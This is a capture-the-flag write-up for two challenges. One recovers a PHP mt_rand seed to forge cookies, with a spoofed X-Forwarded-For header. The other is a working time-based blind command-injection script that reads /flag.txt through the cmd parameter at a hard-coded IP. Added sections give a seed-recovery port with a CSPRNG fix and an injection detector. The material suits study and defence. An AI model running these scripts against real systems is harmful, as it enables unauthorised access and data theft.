
 2020-08-28   361

"Diaoyucheng Cup" (钓鱼城杯) International Cybersecurity Skills Competition Writeup

easyseed

index.bak:

```php
<?php
// index.bak: the challenge's cookie generation. Both tokens come from mt_rand(),
// which is seeded from a single 32-bit value and is therefore fully predictable.
// (The character sets, including their odd duplicated letters, are reproduced
// from the challenge file as-is.)
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

// Builds a string of $length characters, one mt_rand(0, $max) draw per character.
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
```

Brute-force the mt_rand() seed with php_mt_seed. Since the `lock` cookie is short and its alphabet is known, each of its characters pins down one mt_rand(0, 51) output. Generate the arguments for the php_mt_seed tool with a script:

```python
# Emit one "min max rangemin rangemax" group per character of the observed
# lock, which is the argument format php_mt_seed expects.
str1 = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
str2 = 'vEUHaY'  # lock cookie observed from the server
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # mt_rand(0, 51) returned j for this position
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
```

Brute-force the seed:

[image: php_mt_seed output]

Then regenerate the key from the recovered seed:

```php
<?php
// Replay the challenge's generator with the recovered seed; with the same seed
// mt_rand() yields the same sequence, so the lock must match and the key follows.
mt_srand(718225);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock.PHP_EOL;
echo $key;

function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
```

Send the payload:

```python
import requests

url = '''http://122.112.252.28:20001/'''
# Both cookies reproduced from the seed above
cookies = {
    'key': 'nRtqGR8mtd9ZOPyI',
    'lock': 'vEUHaY'
}
headers = {
    'X-Forwarded-For': '127.0.0.1'
}
res = requests.get(url=url, cookies=cookies, headers=headers)
print(res.text)
```
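The root cause in easyseed is that mt_rand() is a deterministic function of a 32-bit seed, so a 6-character token leaks enough to identify the seed and everything generated after it. The following is an added example, not code from the writeup: a Python port of PHP's mt_srand()/mt_rand() in the MT19937 mode that is PHP's default since 7.1 (init_genrand seeding, standard twist and tempering, and PHP 7.1+'s rejection-sampling range scaling), plus a port of the challenge's random() helper. It assumes the server ran PHP in that mode; php_mt_seed also covers the legacy mode, and whether this port reproduces the page's tokens for seed 718225 is not asserted here. The names PhpMtRand, tokens_for_seed, recover_seed and secure_random are this example's own.

```python
"""Port of PHP's mt_srand()/mt_rand() (MT_RAND_MT19937 mode, the default since
PHP 7.1) and of the easyseed random() helper, to show why a token built from
mt_rand() is recoverable from its 32-bit seed, and what the fix looks like."""
import secrets

# Character sets copied from the challenge's index.bak (typos included)
LOCK_CHARS = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
KEY_CHARS = '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'

N, M = 624, 397
MASK32 = 0xFFFFFFFF


class PhpMtRand:
    """MT19937 with PHP's seeding (init_genrand) and PHP 7.1+ range scaling."""

    def __init__(self, seed):
        s = [0] * N
        s[0] = seed & MASK32
        for i in range(1, N):
            s[i] = (1812433253 * (s[i - 1] ^ (s[i - 1] >> 30)) + i) & MASK32
        self.state = s
        self.index = N  # PHP twists right after seeding; we do it lazily

    def _twist(self):
        s = self.state
        for i in range(N):
            y = (s[i] & 0x80000000) | (s[(i + 1) % N] & 0x7FFFFFFF)
            s[i] = s[(i + M) % N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def next_u32(self):
        """Raw tempered 32-bit output (PHP's internal php_mt_rand())."""
        if self.index >= N:
            self._twist()
        y = self.state[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32

    def mt_rand(self, lo, hi):
        """PHP 7.1+ mt_rand($lo, $hi): unbiased range via rejection sampling."""
        umax = hi - lo
        r = self.next_u32()
        if umax == MASK32:
            return lo + r
        umax += 1
        if umax & (umax - 1) == 0:            # power of two: mask, no bias
            return lo + (r & (umax - 1))
        limit = MASK32 - (MASK32 % umax) - 1  # values above this would bias the modulus
        while r > limit:
            r = self.next_u32()
        return lo + r % umax


def php_random(rng, length, chars):
    """Port of the challenge's random(): one mt_rand(0, max) draw per character."""
    return ''.join(chars[rng.mt_rand(0, len(chars) - 1)] for _ in range(length))


def tokens_for_seed(seed):
    """(lock, key) exactly as index.bak would produce them after mt_srand(seed)."""
    rng = PhpMtRand(seed)
    lock = php_random(rng, 6, LOCK_CHARS)
    key = php_random(rng, 16, KEY_CHARS)
    return lock, key


def recover_seed(observed_lock, candidates):
    """First candidate seed whose lock matches. The full space is only 2**32,
    which is why a compiled tool like php_mt_seed finishes in minutes."""
    for seed in candidates:
        if tokens_for_seed(seed)[0] == observed_lock:
            return seed
    return None


def secure_random(length, chars):
    """Hardened replacement: a CSPRNG (PHP: random_int()) has no recoverable seed."""
    return ''.join(secrets.choice(chars) for _ in range(length))


if __name__ == "__main__":
    lock, key = tokens_for_seed(718225)
    print("seed 718225 ->", lock, key)
    print("recovered:", recover_seed(tokens_for_seed(1234)[0], range(1500)))
    print("csprng lock:", secure_random(6, LOCK_CHARS))
```

The first raw output for seed 5489 is the reference value 3499211612 shared by every correct MT19937, which is a convenient self-check for the port. The defensive takeaway is in secure_random(): session identifiers and keys must come from a CSPRNG, because no amount of output masking helps when the whole state is a 32-bit seed.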

easyweb

Capture the request.

The `cmd` parameter gives command execution, but nothing is echoed back, so extract the flag with a time-based blind approach:

```python
import requests
from time import time

url = 'http://119.3.37.185/'
# Compare one character of the flag; a correct guess is signalled by a 2 s delay.
payload = 'if [ `cut -c {num1} /flag.txt` = "{num2}" ];then sleep 2;fi'
flag = ''
# cut -c numbers characters from 1, so start the position counter at 1
for i in range(1, 400):
    for j in range(32, 127):
        data = {
            'cmd': payload.format(num1=str(i), num2=chr(j))
        }
        start_time = time()
        requests.post(url, data=data)
        if time() - start_time > 2:
            flag += chr(j)
            print(flag)
            if chr(j) == '}':
                exit()
```
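From the defender's side, the easyweb probe above has two loud signatures: every request body carries a shell conditional wrapped around sleep, and one client produces a run of responses that all take about the injected delay. The following is an added example, not code from the writeup or the challenge: a small detector that runs both checks over an application log. The JSON-lines log format, the sample records, and the thresholds (2 s, five slow responses within 60 s) are constructed for this example; the probe string is the page's own payload shape.

```python
"""Detection for time-based blind command injection of the kind used against
the easyweb challenge: payloads carrying shell control constructs, and a client
producing a burst of responses that take as long as the injected sleep."""
import json
import re
from collections import defaultdict

# Shell constructs that have no business inside a form-field value
INJECTION_PATTERNS = [
    re.compile(r'\bsleep\s+\d'),                 # time-delay primitive
    re.compile(r'\bif\s+\[.*\]\s*;\s*then\b'),   # conditional wrapper
    re.compile(r'`[^`]*`|\$\([^)]*\)'),          # command substitution
    re.compile(r'\bcut\s+-c\b|\bcat\s+/'),       # character extraction / file read
]
SLOW_SECONDS = 2.0      # matches the sleep used by the probe in the writeup
BURST_THRESHOLD = 5     # slow responses from one client ...
WINDOW_SECONDS = 60     # ... within this window


def parse_line(line):
    """One JSON record per line: ts (epoch s), src, rt (response seconds), params."""
    return json.loads(line)


def payload_alerts(records):
    """Records in which any parameter value matches a shell-injection pattern."""
    alerts = []
    for rec in records:
        for name, value in rec.get("params", {}).items():
            if any(p.search(value) for p in INJECTION_PATTERNS):
                alerts.append({"ts": rec["ts"], "src": rec["src"], "param": name, "value": value})
                break
    return alerts


def slow_burst_alerts(records):
    """Sources with >= BURST_THRESHOLD slow responses inside a WINDOW_SECONDS window."""
    by_src = defaultdict(list)
    for rec in records:
        if rec["rt"] >= SLOW_SECONDS:
            by_src[rec["src"]].append(rec["ts"])
    alerts = []
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):           # sliding window over slow timestamps
            while times[end] - times[start] > WINDOW_SECONDS:
                start += 1
            if end - start + 1 >= BURST_THRESHOLD:
                alerts.append({"src": src, "count": end - start + 1, "until": times[end]})
                break
    return alerts


def analyze(log_text):
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return payload_alerts(records), slow_burst_alerts(records)


# --- constructed sample log -------------------------------------------------
def _rec(ts, src, rt, **params):
    return json.dumps({"ts": ts, "src": src, "rt": rt, "params": params})

PROBE = 'if [ `cut -c {pos} /flag.txt` = "{ch}" ];then sleep 2;fi'  # page's payload shape
SAMPLE_LOG = "\n".join([
    _rec(1598600000, "10.0.0.5", 0.04, name="alice"),                 # benign
    _rec(1598600001, "10.0.0.5", 0.03, name="bob"),                   # benign
    _rec(1598600010, "203.0.113.9", 3.50),                            # one slow, benign
    _rec(1598600020, "10.0.0.7", 0.02, cmd=PROBE.format(pos=1, ch="a")),  # wrong guess
    _rec(1598600021, "10.0.0.7", 2.01, cmd=PROBE.format(pos=1, ch="f")),  # hit
    _rec(1598600022, "10.0.0.7", 2.02, cmd=PROBE.format(pos=2, ch="l")),  # hit
    _rec(1598600023, "10.0.0.7", 2.01, cmd=PROBE.format(pos=3, ch="a")),  # hit
    _rec(1598600024, "10.0.0.7", 0.02, cmd=PROBE.format(pos=4, ch="f")),  # wrong guess
    _rec(1598600025, "10.0.0.7", 2.03, cmd=PROBE.format(pos=4, ch="g")),  # hit
    _rec(1598600026, "10.0.0.7", 2.01, cmd=PROBE.format(pos=5, ch="{")),  # hit
])

if __name__ == "__main__":
    payload_hits, bursts = analyze(SAMPLE_LOG)
    print(len(payload_hits), "injection-pattern requests;", bursts)
```

The pattern check catches the probe on its first request, before any timing signal exists; the burst check is the fallback for payloads that evade the regexes, and it will also fire on a genuinely slow endpoint, so it is best treated as a correlation rule rather than a standalone block. Either way, the durable fix is to stop passing request parameters to a shell at all.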
Copyright © ca01h 2019-2020